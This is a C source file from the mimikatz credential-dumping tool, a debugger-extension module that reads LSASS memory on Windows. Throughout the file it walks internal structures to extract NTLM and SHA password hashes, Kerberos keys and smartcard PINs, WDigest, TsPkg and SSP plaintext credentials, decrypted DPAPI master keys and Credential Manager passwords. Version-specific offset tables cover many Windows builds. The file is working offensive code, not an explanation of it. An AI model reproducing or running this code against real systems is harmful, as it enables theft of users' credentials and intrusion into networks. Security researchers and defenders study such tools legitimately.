mimikatz/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.c

380 lines
19 KiB
C

/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kuhl_m_sekurlsa_packages.h"
const ANSI_STRING PRIMARY_STRING = {7, 8, "Primary"}, CREDENTIALKEYS_STRING = {14, 15, "CredentialKeys"};
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_MSV1_0_CREDENTIALS credentials;
KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
ULONG_PTR pPrimary, pCreds = (ULONG_PTR) pData->pCredentials;
DWORD flags;
while(pCreds)
{
if(ReadMemory(pCreds, &credentials, sizeof(KIWI_MSV1_0_CREDENTIALS), NULL))
{
pPrimary = (ULONG_PTR) credentials.PrimaryCredentials;
while(pPrimary)
{
if(ReadMemory(pPrimary, &primaryCredentials, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS), NULL))
{
if(kull_m_string_getDbgUnicodeString(&primaryCredentials.Credentials))
{
if(kull_m_string_getDbgUnicodeString((PUNICODE_STRING) &primaryCredentials.Primary))
{
dprintf("\n\t [%08x] %Z", credentials.AuthenticationPackageId, &primaryCredentials.Primary);
if(RtlEqualString(&primaryCredentials.Primary, &PRIMARY_STRING, FALSE))
flags = KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY;
else if(RtlEqualString(&primaryCredentials.Primary, &CREDENTIALKEYS_STRING, FALSE))
flags = KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY;
else
flags = 0;
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &primaryCredentials.Credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL | flags);
LocalFree(primaryCredentials.Primary.Buffer);
}
LocalFree(primaryCredentials.Credentials.Buffer);
}
} else dprintf("n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)");
pPrimary = (ULONG_PTR) primaryCredentials.next;
}
pCreds = (ULONG_PTR) credentials.next;
} else dprintf("n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)");
}
}
const MSV1_0_PRIMARY_HELPER msv1_0_primaryHelper[] = {
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, UserName), 0, FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isShaOwPassword), 0, FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, ShaOwPassword), 0, 0},
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isShaOwPassword), 0, FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, ShaOwPassword), 0, FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, align0)},
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isShaOwPassword), 0, FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, ShaOwPassword), 0, FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align2)},
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_1607, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_1607, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_1607, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_1607, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_1607, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_1607, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_1607, isDPAPIProtected), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_1607, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_1607, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_1607, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_1607, DPAPIProtected), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_1607, isoSize)},
};
const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper()
{
const MSV1_0_PRIMARY_HELPER * helper;
if(NtBuildNumber < KULL_M_WIN_BUILD_10_1507)
helper = &msv1_0_primaryHelper[0];
else if(NtBuildNumber < KULL_M_WIN_BUILD_10_1511)
helper = &msv1_0_primaryHelper[1];
else if(NtBuildNumber < KULL_M_WIN_BUILD_10_1607)
helper = &msv1_0_primaryHelper[2];
else
helper = &msv1_0_primaryHelper[3];
return helper;
}
const KERB_INFOS kerbHelper[] = {
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, SmartcardInfos),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, pKeyList),
FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
sizeof(KERB_HASHPASSWORD_6),
sizeof(KIWI_KERBEROS_LOGON_SESSION),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspDataLength),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, SmartcardInfos),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, pKeyList),
FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
sizeof(KERB_HASHPASSWORD_6),
sizeof(KIWI_KERBEROS_LOGON_SESSION),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspDataLength),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, SmartcardInfos),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, pKeyList),
FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
sizeof(KERB_HASHPASSWORD_6),
sizeof(KIWI_KERBEROS_LOGON_SESSION),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspDataLength),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, SmartcardInfos),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, pKeyList),
FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
sizeof(KERB_HASHPASSWORD_6),
sizeof(KIWI_KERBEROS_LOGON_SESSION_10),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspDataLength),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData)
},
{
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, LocallyUniqueIdentifier),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, credentials),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, SmartcardInfos),
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, pKeyList),
FIELD_OFFSET(KERB_HASHPASSWORD_6_1607, generic),
sizeof(KERB_HASHPASSWORD_6_1607),
sizeof(KIWI_KERBEROS_LOGON_SESSION_10_1607),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspDataLength),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData)
}
};
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
PBYTE data;
KIWI_KERBEROS_KEYS_LIST_6 keyList;
PKERB_HASHPASSWORD_6 pHashPassword;
DWORD i, szCsp;
ULONG_PTR ptr;
ULONG KerbOffsetIndex;
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
PBYTE infosCsp;
if(NtBuildNumber < KULL_M_WIN_MIN_BUILD_7)
KerbOffsetIndex = 0;
else if(NtBuildNumber < KULL_M_WIN_MIN_BUILD_8)
KerbOffsetIndex = 1;
else if(NtBuildNumber < KULL_M_WIN_MIN_BUILD_10)
KerbOffsetIndex = 2;
else if(NtBuildNumber < KULL_M_WIN_BUILD_10_1607)
KerbOffsetIndex = 3;
else
KerbOffsetIndex = 4;
if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pKerbGlobalLogonSessionTable, kerbHelper[KerbOffsetIndex].offsetLuid, pData->LogonId))
{
if(data = (PBYTE) LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structSize))
{
if(ReadMemory(ptr, data, (ULONG) kerbHelper[KerbOffsetIndex].structSize, NULL))
{
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (data + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, (NtBuildNumber < KULL_M_WIN_BUILD_10_1507) ? 0 : (NtBuildNumber < KULL_M_WIN_BUILD_10_1607) ? KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10_1607);
if(ptr = (ULONG_PTR) *(PVOID *) (data + kerbHelper[KerbOffsetIndex].offsetPin))
if(infosCsp = (PBYTE) LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structCspInfosSize))
{
if(ReadMemory(ptr, infosCsp, (ULONG) kerbHelper[KerbOffsetIndex].structCspInfosSize, NULL))
{
creds.UserName = *(PUNICODE_STRING) infosCsp;
if(szCsp = *(PDWORD) (infosCsp + kerbHelper[KerbOffsetIndex].offsetSizeOfCsp))
{
creds.Domaine.Length = (USHORT) (szCsp - (kerbHelper[KerbOffsetIndex].offsetNames - kerbHelper[KerbOffsetIndex].structCspInfosSize));
if(creds.Domaine.Buffer = (PWSTR) LocalAlloc(LPTR, creds.Domaine.Length))
ReadMemory(ptr + kerbHelper[KerbOffsetIndex].offsetNames, creds.Domaine.Buffer, creds.Domaine.Length, NULL);
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE);
if(creds.Domaine.Buffer)
LocalFree(creds.Domaine.Buffer);
}
LocalFree(infosCsp);
}
if(ptr = (ULONG_PTR) *(PVOID *) (data + kerbHelper[KerbOffsetIndex].offsetKeyList))
if(ReadMemory(ptr, &keyList, sizeof(KIWI_KERBEROS_KEYS_LIST_6)/* - sizeof(KERB_HASHPASSWORD_6)*/, NULL))
{
i = keyList.cbItem * (DWORD) kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
if(pHashPassword = (PKERB_HASHPASSWORD_6) LocalAlloc(LPTR, i))
{
if(ReadMemory(ptr + sizeof(KIWI_KERBEROS_KEYS_LIST_6)/* - sizeof(KERB_HASHPASSWORD_6)*/, pHashPassword, i, NULL))
{
dprintf("\n\t * Key List\n");
for(i = 0; i < keyList.cbItem; i++)
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) pHashPassword + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((NtBuildNumber < KULL_M_WIN_BUILD_10_1507) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10));
}
LocalFree(pHashPassword);
}
}
}
LocalFree(data);
}
}
else dprintf("KO");
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN ULONG_PTR pLiveGlobalLogonSessionList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_LIVESSP_LIST_ENTRY credentials;
KIWI_LIVESSP_PRIMARY_CREDENTIAL primaryCredential;
ULONG_PTR ptr;
if(ptr = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(pLiveGlobalLogonSessionList, FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
{
if(ReadMemory(ptr, &credentials, sizeof(KIWI_LIVESSP_LIST_ENTRY), NULL))
if(ptr = (ULONG_PTR) credentials.suppCreds)
if(ReadMemory(ptr, &primaryCredential, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL), NULL))
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData->LogonId, (NtBuildNumber != 9431) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT);
} else dprintf("KO");
}
const KIWI_TS_CREDENTIAL_HELPER tsCredentialHelper[] = {
{FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_TS_CREDENTIAL, pTsPrimary)},
{FIELD_OFFSET(KIWI_TS_CREDENTIAL_1607, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_TS_CREDENTIAL_1607, pTsPrimary)}
};
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN ULONG_PTR pTSGlobalCredTable, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_TS_PRIMARY_CREDENTIAL primaryCredential;
ULONG_PTR ptr;
PVOID buffer;
LONG TsOffsetIndex = (NtBuildNumber < KULL_M_WIN_BUILD_10_1607) ? 0 : 1;
if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pTSGlobalCredTable, tsCredentialHelper[TsOffsetIndex].offsetToLuid, pData->LogonId))
{
if(ReadMemory(ptr + tsCredentialHelper[TsOffsetIndex].offsetToTsPrimary, &buffer, sizeof(PVOID), NULL))
if(ReadMemory((ULONG_PTR) buffer, &primaryCredential, sizeof(KIWI_TS_PRIMARY_CREDENTIAL), NULL))
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN);
}
else dprintf("KO");
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN ULONG_PTR pl_LogSessList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
ULONG_PTR ptr;
BYTE buffer[offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL)];
if(ptr = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(pl_LogSessList, FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
{
if(ReadMemory(ptr, buffer, sizeof(buffer), NULL))
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (buffer + offsetWDigestPrimary), pData->LogonId, 0);
}
else dprintf("KO");
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspCredentialList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials;
ULONG_PTR ptr;
ULONG monNb = 0;
if(ReadMemory(pSspCredentialList, &mesCredentials, sizeof(LIST_ENTRY), NULL))
{
ptr = (ULONG_PTR) mesCredentials.Flink;
while(ptr != pSspCredentialList)
{
if(ReadMemory(ptr, &mesCredentials, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY), NULL))
{
if(SecEqualLuid(pData->LogonId, &mesCredentials.LogonId) && (mesCredentials.credentials.UserName.Buffer || mesCredentials.credentials.Domaine.Buffer || mesCredentials.credentials.Password.Buffer))
{
dprintf("\n\t [%08x]", monNb++);
kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN);
}
ptr = (ULONG_PTR) mesCredentials.Flink;
}
else break;
}
}
else dprintf("KO");
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_MASTERKEY_CACHE_ENTRY mesCredentials;
ULONG_PTR ptr;
ULONG monNb = 0;
PBYTE buffer;
if(ReadMemory(pMasterKeyCacheList, &mesCredentials, sizeof(LIST_ENTRY), NULL))
{
ptr = (ULONG_PTR) mesCredentials.Flink;
while(ptr != pMasterKeyCacheList)
{
if(ReadMemory(ptr, &mesCredentials, sizeof(KIWI_MASTERKEY_CACHE_ENTRY), NULL))
{
if(SecEqualLuid(pData->LogonId, &mesCredentials.LogonId))
{
dprintf("\n\t [%08x]\n\t * GUID :\t", monNb++);
kull_m_string_displayGUID(&mesCredentials.KeyUid);
dprintf("\n\t * Time :\t"); kull_m_string_displayFileTime(&mesCredentials.insertTime);
if(buffer = (PBYTE) LocalAlloc(LPTR, mesCredentials.keySize))
{
if(ReadMemory(ptr + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key), buffer, mesCredentials.keySize, NULL))
{
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer, mesCredentials.keySize);
dprintf("\n\t * MasterKey :\t"); kull_m_string_dprintf_hex(buffer, mesCredentials.keySize, 0);
}
LocalFree(buffer);
}
}
ptr = (ULONG_PTR) mesCredentials.Flink;
}
else break;
}
}
else dprintf("KO");
}
const CREDMAN_INFOS credhelper[] = {
{
sizeof(KIWI_CREDMAN_LIST_ENTRY_60),
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, Flink),
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, user),
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, server2),
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, cbEncPassword),
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, encPassword),
},
{
sizeof(KIWI_CREDMAN_LIST_ENTRY),
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, Flink),
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, user),
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, server2),
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, cbEncPassword),
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, encPassword),
},
};
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN ULONG_PTR reserved, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_CREDMAN_SET_LIST_ENTRY setList;
KIWI_CREDMAN_LIST_STARTER listStarter;
DWORD nbCred = 0;
ULONG_PTR pCur, pRef;
KIWI_GENERIC_PRIMARY_CREDENTIAL kiwiCreds;
PBYTE buffer;
ULONG CredOffsetIndex = (NtBuildNumber < KULL_M_WIN_BUILD_7) ? 0 : 1;
if(pData->pCredentialManager)
{
if(ReadMemory((ULONG_PTR) pData->pCredentialManager, &setList, sizeof(KIWI_CREDMAN_SET_LIST_ENTRY), NULL))
{
if(setList.list1)
{
pRef = (ULONG_PTR) setList.list1 + FIELD_OFFSET(KIWI_CREDMAN_LIST_STARTER, start);
if(ReadMemory((ULONG_PTR) setList.list1, &listStarter, sizeof(KIWI_CREDMAN_LIST_STARTER), NULL))
{
if(pCur = (ULONG_PTR) listStarter.start)
{
if(buffer = (PBYTE) LocalAlloc(LPTR, credhelper[CredOffsetIndex].structSize))
{
while(pCur != pRef)
{
pCur -= credhelper[CredOffsetIndex].offsetFLink;
if(ReadMemory(pCur, buffer, credhelper[CredOffsetIndex].structSize, NULL))
{
dprintf("\n\t [%08x]", nbCred);
kiwiCreds.UserName = *(PUNICODE_STRING) (buffer + credhelper[CredOffsetIndex].offsetUsername);
kiwiCreds.Domaine = *(PUNICODE_STRING) (buffer + credhelper[CredOffsetIndex].offsetDomain);
kiwiCreds.Password.Length = kiwiCreds.Password.MaximumLength = *(PUSHORT) (buffer + credhelper[CredOffsetIndex].offsetCbPassword);;
kiwiCreds.Password.Buffer = *(PWSTR *) (buffer + credhelper[CredOffsetIndex].offsetPassword);
kuhl_m_sekurlsa_genericCredsOutput(&kiwiCreds, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS);
pCur = (ULONG_PTR) *(PVOID *) (buffer + credhelper[CredOffsetIndex].offsetFLink);
}
else break;
nbCred++;
}
LocalFree(buffer);
}
}
}
}
}
}
}